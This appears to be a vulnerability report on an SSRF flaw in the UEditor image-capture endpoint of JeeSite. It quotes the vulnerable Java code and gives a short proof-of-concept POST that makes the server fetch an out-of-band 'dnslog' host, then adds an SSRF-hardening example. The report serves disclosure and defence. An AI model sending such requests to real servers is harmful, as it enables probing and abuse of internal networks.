Closed
Description
Summary
UEditor has an SSRF vulnerability, and this project is using the vulnerable version.
Details
- Taint Source:
src/main/java/com/jeesite/modules/file/web/UeditorController.java
```java
@Controller
@RequestMapping(value = "${adminPath}/file/ueditor")
@ConditionalOnProperty(name={"file.enabled","web.core.enabled"}, havingValue="true", matchIfMissing=true)
public class UeditorController extends BaseController {

    @RequestMapping(value = "")
    @ResponseBody
    public String upload(HttpServletRequest request, HttpServletResponse response) {
        return upload(null, request, response);
    }

    @RequestMapping(value = "{action}")
    @ResponseBody
    public String upload(@PathVariable String action, HttpServletRequest request, HttpServletResponse response) {
        String rootPath = Global.getUserfilesBaseDir(null);
        return new ActionEnter(request, rootPath, action).exec();
    }
}
```
- Taint Sink:
src/main/java/com/jeesite/common/ueditor/hunter/ImageHunter.java
```java
public State captureRemoteData(String urlStr) {
    HttpURLConnection connection = null;
    URL url = null;
    String suffix = null;
    try {
        url = new URL(urlStr);
        if (!validHost(url.getHost())) {
            return new BaseState(false, AppInfo.PREVENT_HOST);
        }
        connection = (HttpURLConnection) url.openConnection();
        connection.setInstanceFollowRedirects(true);
        connection.setUseCaches(true);
        // ... (the excerpt in the report ends here)
```
POC
http://127.0.0.1:8980/js/a/file/ueditor/catchimage?fieldName=source
POST
source[]=http://dnslog

Impact
https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks
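
One way to harden a fetch like `captureRemoteData` against SSRF, shown as an added example that is not part of the original report and is not JeeSite or UEditor code: resolve the host, reject internal address ranges, and do not follow redirects. `SsrfGuard` and its method names are hypothetical, and the sample URLs in `main` are constructed.

```java
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.UnknownHostException;

// Added example; SsrfGuard and its methods are hypothetical, not JeeSite/UEditor APIs.
public class SsrfGuard {
    // fc00::/7 (IPv6 unique local) is not covered by isSiteLocalAddress().
    static boolean isUniqueLocalV6(InetAddress a) {
        byte[] b = a.getAddress();
        return b.length == 16 && (b[0] & 0xfe) == 0xfc;
    }
    // True only if no resolved address is wildcard, loopback, link-local, private or multicast.
    static boolean isPublicHost(String host) {
        try {
            for (InetAddress a : InetAddress.getAllByName(host)) {
                if (a.isAnyLocalAddress() || a.isLoopbackAddress() || a.isLinkLocalAddress()
                        || a.isSiteLocalAddress() || a.isMulticastAddress() || isUniqueLocalV6(a)) {
                    return false;
                }
            }
            return true;
        } catch (UnknownHostException e) {
            return false; // fail closed when the name does not resolve
        }
    }
    // Accept only http/https URLs whose host passes isPublicHost().
    static boolean isAllowedUrl(String urlStr) {
        try {
            URL url = new URL(urlStr);
            String scheme = url.getProtocol();
            return (scheme.equals("http") || scheme.equals("https")) && isPublicHost(url.getHost());
        } catch (MalformedURLException e) {
            return false;
        }
    }
    // Open a connection only to an allowed destination, with redirects disabled.
    static HttpURLConnection open(String urlStr) throws IOException {
        if (!isAllowedUrl(urlStr)) throw new IOException("destination not allowed");
        HttpURLConnection c = (HttpURLConnection) new URL(urlStr).openConnection();
        c.setInstanceFollowRedirects(false); // a redirect could point at an internal address
        return c;
    }
    public static void main(String[] args) {
        // Constructed sample inputs (IP literals, so no DNS lookup is needed).
        String[] samples = {"http://127.0.0.1:8980/x", "http://169.254.169.254/", "http://10.0.0.5/a.png"};
        for (String u : samples) System.out.println(u + " -> " + isAllowedUrl(u));
    }
}
```

The check resolves the name separately from the connection, so a hostname whose DNS answer changes between the two lookups can still reach an internal address; connecting to the already-validated IP address closes that gap.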